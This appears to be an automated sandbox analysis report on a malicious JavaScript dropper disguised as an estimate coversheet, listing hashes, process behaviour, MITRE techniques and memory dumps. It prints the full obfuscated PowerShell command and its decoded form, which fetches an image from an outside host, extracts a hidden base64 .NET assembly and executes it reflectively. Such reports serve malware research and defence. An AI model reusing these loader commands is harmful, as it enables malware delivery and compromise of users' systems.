26828d3ea7e3871515fd25c9c5ca4306d3a5e19781d7228e8ee074e4ecb128a5

General

Target

Coversheet_Estimate_Rsf38664.js
Size

205KB
MD5

1ccf9ca9abc89e65e76f9b18999e26ef
SHA1

7862d256a30b52e7a3436767a87f310de36d0af7
SHA256

26828d3ea7e3871515fd25c9c5ca4306d3a5e19781d7228e8ee074e4ecb128a5
SHA512

ab9242b042c3ee84b9ad8e86a443c92c45acaa81c92926b7a804b3ec8c0fb186b75d95a7a27d7830f9f15e474a262d90f10f5a5e007f6d42de2e279ed8299abe
SSDEEP

3072:f4b5PAkV+hVJro/B0hsTSD5kyikiC+kQ6DLbi9u6uRSqFBeWpl:U1cqkF

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://wallpapercave.com/uwp/uwp4098452.png

exe.dropper

https://wallpapercave.com/uwp/uwp4098452.png

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
3	2816	powershell.exe
4	2816	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3068	powershell.exe
2816	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3068	powershell.exe
Token: SeDebugPrivilege	2816	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2148 wrote to memory of 3068	2148	wscript.exe	28
PID 2148 wrote to memory of 3068	2148	wscript.exe	28
PID 2148 wrote to memory of 3068	2148	wscript.exe	28
PID 3068 wrote to memory of 2816	3068	powershell.exe	30
PID 3068 wrote to memory of 2816	3068	powershell.exe	30
PID 3068 wrote to memory of 2816	3068	powershell.exe	30

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Coversheet_Estimate_Rsf38664.js
1⤵
- Suspicious use of WriteProcessMemory
PID:2148
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'J☪❞Bp☪❞G0☪❞YQBn☪❞GU☪❞VQBy☪❞Gw☪❞I☪❞☪❞9☪❞C☪❞☪❞JwBo☪❞HQ☪❞d☪❞Bw☪❞HM☪❞Og☪❞v☪❞C8☪❞dwBh☪❞Gw☪❞b☪❞Bw☪❞GE☪❞c☪❞Bl☪❞HI☪❞YwBh☪❞HY☪❞ZQ☪❞u☪❞GM☪❞bwBt☪❞C8☪❞dQB3☪❞H☪❞☪❞LwB1☪❞Hc☪❞c☪❞☪❞0☪❞D☪❞☪❞OQ☪❞4☪❞DQ☪❞NQ☪❞y☪❞C4☪❞c☪❞Bu☪❞Gc☪❞Jw☪❞7☪❞CQ☪❞dwBl☪❞GI☪❞QwBs☪❞Gk☪❞ZQBu☪❞HQ☪❞I☪❞☪❞9☪❞C☪❞☪❞TgBl☪❞Hc☪❞LQBP☪❞GI☪❞agBl☪❞GM☪❞d☪❞☪❞g☪❞FM☪❞eQBz☪❞HQ☪❞ZQBt☪❞C4☪❞TgBl☪❞HQ☪❞LgBX☪❞GU☪❞YgBD☪❞Gw☪❞aQBl☪❞G4☪❞d☪❞☪❞7☪❞CQ☪❞aQBt☪❞GE☪❞ZwBl☪❞EI☪❞eQB0☪❞GU☪❞cw☪❞g☪❞D0☪❞I☪❞☪❞k☪❞Hc☪❞ZQBi☪❞EM☪❞b☪❞Bp☪❞GU☪❞bgB0☪❞C4☪❞R☪❞Bv☪❞Hc☪❞bgBs☪❞G8☪❞YQBk☪❞EQ☪❞YQB0☪❞GE☪❞K☪❞☪❞k☪❞Gk☪❞bQBh☪❞Gc☪❞ZQBV☪❞HI☪❞b☪❞☪❞p☪❞Ds☪❞J☪❞Bp☪❞G0☪❞YQBn☪❞GU☪❞V☪❞Bl☪❞Hg☪❞d☪❞☪❞g☪❞D0☪❞I☪❞Bb☪❞FM☪❞eQBz☪❞HQ☪❞ZQBt☪❞C4☪❞V☪❞Bl☪❞Hg☪❞d☪❞☪❞u☪❞EU☪❞bgBj☪❞G8☪❞Z☪❞Bp☪❞G4☪❞ZwBd☪❞Do☪❞OgBV☪❞FQ☪❞Rg☪❞4☪❞C4☪❞RwBl☪❞HQ☪❞UwB0☪❞HI☪❞aQBu☪❞Gc☪❞K☪❞☪❞k☪❞Gk☪❞bQBh☪❞Gc☪❞ZQBC☪❞Hk☪❞d☪❞Bl☪❞HM☪❞KQ☪❞7☪❞CQ☪❞cwB0☪❞GE☪❞cgB0☪❞EY☪❞b☪❞Bh☪❞Gc☪❞I☪❞☪❞9☪❞C☪❞☪❞Jw☪❞8☪❞Dw☪❞QgBB☪❞FM☪❞RQ☪❞2☪❞DQ☪❞XwBT☪❞FQ☪❞QQBS☪❞FQ☪❞Pg☪❞+☪❞Cc☪❞Ow☪❞k☪❞GU☪❞bgBk☪❞EY☪❞b☪❞Bh☪❞Gc☪❞I☪❞☪❞9☪❞C☪❞☪❞Jw☪❞8☪❞Dw☪❞QgBB☪❞FM☪❞RQ☪❞2☪❞DQ☪❞XwBF☪❞E4☪❞R☪❞☪❞+☪❞D4☪❞Jw☪❞7☪❞CQ☪❞cwB0☪❞GE☪❞cgB0☪❞Ek☪❞bgBk☪❞GU☪❞e☪❞☪❞g☪❞D0☪❞I☪❞☪❞k☪❞Gk☪❞bQBh☪❞Gc☪❞ZQBU☪❞GU☪❞e☪❞B0☪❞C4☪❞SQBu☪❞GQ☪❞ZQB4☪❞E8☪❞Zg☪❞o☪❞CQ☪❞cwB0☪❞GE☪❞cgB0☪❞EY☪❞b☪❞Bh☪❞Gc☪❞KQ☪❞7☪❞CQ☪❞ZQBu☪❞GQ☪❞SQBu☪❞GQ☪❞ZQB4☪❞C☪❞☪❞PQ☪❞g☪❞CQ☪❞aQBt☪❞GE☪❞ZwBl☪❞FQ☪❞ZQB4☪❞HQ☪❞LgBJ☪❞G4☪❞Z☪❞Bl☪❞Hg☪❞TwBm☪❞Cg☪❞J☪❞Bl☪❞G4☪❞Z☪❞BG☪❞Gw☪❞YQBn☪❞Ck☪❞Ow☪❞k☪❞HM☪❞d☪❞Bh☪❞HI☪❞d☪❞BJ☪❞G4☪❞Z☪❞Bl☪❞Hg☪❞I☪❞☪❞t☪❞Gc☪❞ZQ☪❞g☪❞D☪❞☪❞I☪❞☪❞t☪❞GE☪❞bgBk☪❞C☪❞☪❞J☪❞Bl☪❞G4☪❞Z☪❞BJ☪❞G4☪❞Z☪❞Bl☪❞Hg☪❞I☪❞☪❞t☪❞Gc☪❞d☪❞☪❞g☪❞CQ☪❞cwB0☪❞GE☪❞cgB0☪❞Ek☪❞bgBk☪❞GU☪❞e☪❞☪❞7☪❞CQ☪❞cwB0☪❞GE☪❞cgB0☪❞Ek☪❞bgBk☪❞GU☪❞e☪❞☪❞g☪❞Cs☪❞PQ☪❞g☪❞CQ☪❞cwB0☪❞GE☪❞cgB0☪❞EY☪❞b☪❞Bh☪❞Gc☪❞LgBM☪❞GU☪❞bgBn☪❞HQ☪❞a☪❞☪❞7☪❞CQ☪❞YgBh☪❞HM☪❞ZQ☪❞2☪❞DQ☪❞T☪❞Bl☪❞G4☪❞ZwB0☪❞Gg☪❞I☪❞☪❞9☪❞C☪❞☪❞J☪❞Bl☪❞G4☪❞Z☪❞BJ☪❞G4☪❞Z☪❞Bl☪❞Hg☪❞I☪❞☪❞t☪❞C☪❞☪❞J☪❞Bz☪❞HQ☪❞YQBy☪❞HQ☪❞SQBu☪❞GQ☪❞ZQB4☪❞Ds☪❞J☪❞Bi☪❞GE☪❞cwBl☪❞DY☪❞N☪❞BD☪❞G8☪❞bQBt☪❞GE☪❞bgBk☪❞C☪❞☪❞PQ☪❞g☪❞CQ☪❞aQBt☪❞GE☪❞ZwBl☪❞FQ☪❞ZQB4☪❞HQ☪❞LgBT☪❞HU☪❞YgBz☪❞HQ☪❞cgBp☪❞G4☪❞Zw☪❞o☪❞CQ☪❞cwB0☪❞GE☪❞cgB0☪❞Ek☪❞bgBk☪❞GU☪❞e☪❞☪❞s☪❞C☪❞☪❞J☪❞Bi☪❞GE☪❞cwBl☪❞DY☪❞N☪❞BM☪❞GU☪❞bgBn☪❞HQ☪❞a☪❞☪❞p☪❞Ds☪❞J☪❞Bj☪❞G8☪❞bQBt☪❞GE☪❞bgBk☪❞EI☪❞eQB0☪❞GU☪❞cw☪❞g☪❞D0☪❞I☪❞Bb☪❞FM☪❞eQBz☪❞HQ☪❞ZQBt☪❞C4☪❞QwBv☪❞G4☪❞dgBl☪❞HI☪❞d☪❞Bd☪❞Do☪❞OgBG☪❞HI☪❞bwBt☪❞EI☪❞YQBz☪❞GU☪❞Ng☪❞0☪❞FM☪❞d☪❞By☪❞Gk☪❞bgBn☪❞Cg☪❞J☪❞Bi☪❞GE☪❞cwBl☪❞DY☪❞N☪❞BD☪❞G8☪❞bQBt☪❞GE☪❞bgBk☪❞Ck☪❞Ow☪❞k☪❞Gw☪❞bwBh☪❞GQ☪❞ZQBk☪❞EE☪❞cwBz☪❞GU☪❞bQBi☪❞Gw☪❞eQ☪❞g☪❞D0☪❞I☪❞Bb☪❞FM☪❞eQBz☪❞HQ☪❞ZQBt☪❞C4☪❞UgBl☪❞GY☪❞b☪❞Bl☪❞GM☪❞d☪❞Bp☪❞G8☪❞bg☪❞u☪❞EE☪❞cwBz☪❞GU☪❞bQBi☪❞Gw☪❞eQBd☪❞Do☪❞OgBM☪❞G8☪❞YQBk☪❞Cg☪❞J☪❞Bj☪❞G8☪❞bQBt☪❞GE☪❞bgBk☪❞EI☪❞eQB0☪❞GU☪❞cw☪❞p☪❞Ds☪❞J☪❞B0☪❞Hk☪❞c☪❞Bl☪❞C☪❞☪❞PQ☪❞g☪❞CQ☪❞b☪❞Bv☪❞GE☪❞Z☪❞Bl☪❞GQ☪❞QQBz☪❞HM☪❞ZQBt☪❞GI☪❞b☪❞B5☪❞C4☪❞RwBl☪❞HQ☪❞V☪❞B5☪❞H☪❞☪❞ZQ☪❞o☪❞Cc☪❞RgBp☪❞GI☪❞ZQBy☪❞C4☪❞S☪❞Bv☪❞G0☪❞ZQ☪❞n☪❞Ck☪❞Ow☪❞k☪❞G0☪❞ZQB0☪❞Gg☪❞bwBk☪❞C☪❞☪❞PQ☪❞g☪❞CQ☪❞d☪❞B5☪❞H☪❞☪❞ZQ☪❞u☪❞Ec☪❞ZQB0☪❞E0☪❞ZQB0☪❞Gg☪❞bwBk☪❞Cg☪❞JwBW☪❞EE☪❞SQ☪❞n☪❞Ck☪❞LgBJ☪❞G4☪❞dgBv☪❞Gs☪❞ZQ☪❞o☪❞CQ☪❞bgB1☪❞Gw☪❞b☪❞☪❞s☪❞C☪❞☪❞WwBv☪❞GI☪❞agBl☪❞GM☪❞d☪❞Bb☪❞F0☪❞XQ☪❞g☪❞Cg☪❞JwBN☪❞EM☪❞OQBt☪❞GU☪❞b☪❞BR☪❞Hc☪❞ZQBp☪❞Dk☪❞awBM☪❞DI☪❞VgBs☪❞Ew☪❞bQBW☪❞D☪❞☪❞Yw☪❞y☪❞EY☪❞dwBM☪❞Hk☪❞O☪❞☪❞2☪❞GM☪❞MwBC☪❞D☪❞☪❞Z☪❞BH☪❞Gc☪❞PQ☪❞n☪❞C☪❞☪❞L☪❞☪❞g☪❞Cc☪❞MQ☪❞n☪❞C☪❞☪❞L☪❞☪❞g☪❞Cc☪❞Jw☪❞g☪❞Cw☪❞I☪❞☪❞n☪❞Cc☪❞I☪❞☪❞s☪❞C☪❞☪❞Jw☪❞n☪❞C☪❞☪❞L☪❞☪❞g☪❞Cc☪❞Jw☪❞g☪❞Cw☪❞I☪❞☪❞n☪❞Cc☪❞KQ☪❞p☪❞☪❞==';$OWjuxd = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($codigo.repl"ace('☪❞','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxd"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3068
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://wallpapercave.com/uwp/uwp4098452.png';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('MC9melQwei9kL2VlLmV0c2FwLy86c3B0dGg=' , '1' , '' , '' , '' , '' , ''))"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2816

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
8706a1b92da94063f2349bdaecd1fa93

SHA1
63f237fe590c1f6c18a6e4058e23a2ceb180c9c7

SHA256
6a67aff4ae22e61c457bf18aa19e6967d93aef58858e2efba1bcf21895c043a2

SHA512
52f36ddd23547b4e412a1fc066fa3ad40158493439679b0e4a582ef50df6ebdbc11cadcd96b14e2d25628510e96dcf36112cab4262d56fa5d6fb1749f9c57f21

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K438CXZGV6KTG2YZJYPT.temp

Filesize
7KB

MD5
8706a1b92da94063f2349bdaecd1fa93

SHA1
63f237fe590c1f6c18a6e4058e23a2ceb180c9c7

SHA256
6a67aff4ae22e61c457bf18aa19e6967d93aef58858e2efba1bcf21895c043a2

SHA512
52f36ddd23547b4e412a1fc066fa3ad40158493439679b0e4a582ef50df6ebdbc11cadcd96b14e2d25628510e96dcf36112cab4262d56fa5d6fb1749f9c57f21

Download Submit
memory/2816-19-0x0000000002A70000-0x0000000002AF0000-memory.dmp

Filesize
512KB

Download
memory/2816-17-0x0000000002A70000-0x0000000002AF0000-memory.dmp

Filesize
512KB

Download
memory/2816-23-0x000007FEF5130000-0x000007FEF5ACD000-memory.dmp

Filesize
9.6MB

Download
memory/2816-22-0x0000000002A70000-0x0000000002AF0000-memory.dmp

Filesize
512KB

Download
memory/2816-21-0x0000000002A70000-0x0000000002AF0000-memory.dmp

Filesize
512KB

Download
memory/2816-20-0x0000000002A70000-0x0000000002AF0000-memory.dmp

Filesize
512KB

Download
memory/2816-18-0x000007FEF5130000-0x000007FEF5ACD000-memory.dmp

Filesize
9.6MB

Download
memory/2816-16-0x000007FEF5130000-0x000007FEF5ACD000-memory.dmp

Filesize
9.6MB

Download
memory/3068-10-0x000007FEF5130000-0x000007FEF5ACD000-memory.dmp

Filesize
9.6MB

Download
memory/3068-5-0x0000000002460000-0x0000000002468000-memory.dmp

Filesize
32KB

Download
memory/3068-4-0x000000001B320000-0x000000001B602000-memory.dmp

Filesize
2.9MB

Download
memory/3068-6-0x000007FEF5130000-0x000007FEF5ACD000-memory.dmp

Filesize
9.6MB

Download
memory/3068-8-0x0000000002490000-0x0000000002510000-memory.dmp

Filesize
512KB

Download
memory/3068-9-0x0000000002490000-0x0000000002510000-memory.dmp

Filesize
512KB

Download
memory/3068-7-0x0000000002490000-0x0000000002510000-memory.dmp

Filesize
512KB

Download
memory/3068-24-0x000007FEF5130000-0x000007FEF5ACD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing